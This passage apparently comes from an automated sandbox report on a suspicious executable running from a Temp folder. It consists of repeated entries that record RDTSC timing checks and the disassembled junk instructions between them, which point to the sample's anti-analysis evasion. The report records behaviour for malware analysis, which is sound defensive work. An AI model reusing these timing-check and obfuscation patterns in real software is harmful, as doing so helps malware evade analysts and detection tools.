Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75AB36 second address: 75AB50 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB4246CBDEEh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75AB50 second address: 75AB54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75AB54 second address: 75AB5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75AB5A second address: 75AB60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75AD6E second address: 75AD96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB4246CBDEAh 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75AD96 second address: 75ADA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75B031 second address: 75B036 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75B405 second address: 75B46E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB42454284Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FB424542848h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D20A6h], eax 0x0000002a lea eax, dword ptr [ebp+1248EF81h] 0x00000030 push 00000000h 0x00000032 push eax 0x00000033 call 00007FB424542848h 0x00000038 pop eax 0x00000039 mov dword ptr [esp+04h], eax 0x0000003d add dword ptr [esp+04h], 00000017h 0x00000045 inc eax 0x00000046 push eax 0x00000047 ret 0x00000048 pop eax 0x00000049 ret 0x0000004a mov ch, 37h 0x0000004c push eax 0x0000004d jc 00007FB424542858h 0x00000053 push eax 0x00000054 push edx 0x00000055 jnl 00007FB424542846h 0x0000005b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75B46E second address: 75B472 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75B501 second address: 75B50F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FB424542846h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75B50F second address: 73A5B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b or edx, 04B819FEh 0x00000011 call dword ptr [ebp+122D196Eh] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 73A5B6 second address: 73A5BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 73A5BA second address: 73A5C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 71A7A6 second address: 71A7AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 71A7AC second address: 71A7B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7844CD second address: 784507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 js 00007FB424542846h 0x0000000e jmp 00007FB424542855h 0x00000013 popad 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FB424542852h 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 784682 second address: 784688 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7847A1 second address: 7847A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7847A5 second address: 7847A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 784D1A second address: 784D25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FB424542846h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 709853 second address: 709857 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 709857 second address: 70987A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FB424542852h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 70987A second address: 709880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 709880 second address: 709884 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 709884 second address: 70988A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 78E415 second address: 78E41F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 78E41F second address: 78E429 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB4246CBDECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 78D67A second address: 78D697 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB424542856h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 78D697 second address: 78D69D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 78D7CB second address: 78D7D9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FB424542846h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 78D7D9 second address: 78D7F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 78D7F3 second address: 78D811 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB424542853h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 78D811 second address: 78D81F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FB4246CBDE6h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 78D81F second address: 78D823 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 78DB51 second address: 78DB69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007FB4246CBDEEh 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 78DB69 second address: 78DB7D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB424542846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b jl 00007FB42454286Eh 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 78DB7D second address: 78DB83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 78E14A second address: 78E15E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB424542850h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 792351 second address: 792358 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 796870 second address: 796876 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 796876 second address: 79687F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 79687F second address: 796888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7969DC second address: 7969E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 796B80 second address: 796B86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 796B86 second address: 796B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FB4246CBDE6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 796B91 second address: 796B99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 796E1D second address: 796E29 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB4246CBDEEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 796F96 second address: 796F9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 79722A second address: 79723B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jng 00007FB4246CBDECh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 79735E second address: 797390 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB424542856h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FB424542851h 0x0000000f pushad 0x00000010 popad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 797890 second address: 7978A0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB4246CBDE6h 0x00000008 je 00007FB4246CBDE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7978A0 second address: 7978C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB424542851h 0x00000007 pushad 0x00000008 jmp 00007FB42454284Ch 0x0000000d ja 00007FB424542846h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 796261 second address: 7962A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007FB4246CBDEBh 0x0000000a jmp 00007FB4246CBDF3h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 jbe 00007FB4246CBDEEh 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c je 00007FB4246CBDECh 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 79A127 second address: 79A12B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 79A12B second address: 79A146 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB4246CBDE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB4246CBDEFh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 79A146 second address: 79A178 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FB424542856h 0x0000000c jne 00007FB424542846h 0x00000012 jmp 00007FB42454284Ah 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FB42454284Fh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 79A178 second address: 79A17C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 79A17C second address: 79A182 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 79A182 second address: 79A18C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 79A18C second address: 79A190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 79A190 second address: 79A1AC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FB4246CBDF6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 79A1AC second address: 79A1B1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 799CE1 second address: 799CE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 799CE5 second address: 799CF8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007FB424542848h 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 799CF8 second address: 799CFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 79C85C second address: 79C860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 79C860 second address: 79C875 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB4246CBDE6h 0x00000008 jc 00007FB4246CBDE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 79C875 second address: 79C87C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 79C87C second address: 79C885 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 79C885 second address: 79C88B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 79CA14 second address: 79CA18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 79CA18 second address: 79CA25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 79CA25 second address: 79CA29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 79CA29 second address: 79CA2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 715634 second address: 715638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 715638 second address: 71563C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 71563C second address: 715646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 715646 second address: 71564A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 71564A second address: 71567F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDECh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FB4246CBDF1h 0x00000015 jg 00007FB4246CBDE6h 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 71567F second address: 715683 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7A1BA3 second address: 7A1BBD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jne 00007FB4246CBDE6h 0x00000011 jl 00007FB4246CBDE6h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7A1BBD second address: 7A1BED instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 js 00007FB424542846h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB424542858h 0x00000013 push ecx 0x00000014 pushad 0x00000015 popad 0x00000016 jp 00007FB424542846h 0x0000001c pop ecx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7A1BED second address: 7A1BF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7A1D79 second address: 7A1D7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7A1D7D second address: 7A1D81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7A6980 second address: 7A699C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB424542855h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7A699C second address: 7A69C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 jo 00007FB4246CBE0Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FB4246CBDEAh 0x00000016 jmp 00007FB4246CBDF1h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7A69C8 second address: 7A69CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7A6B31 second address: 7A6B48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007FB4246CBDF4h 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7A6CB5 second address: 7A6CB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
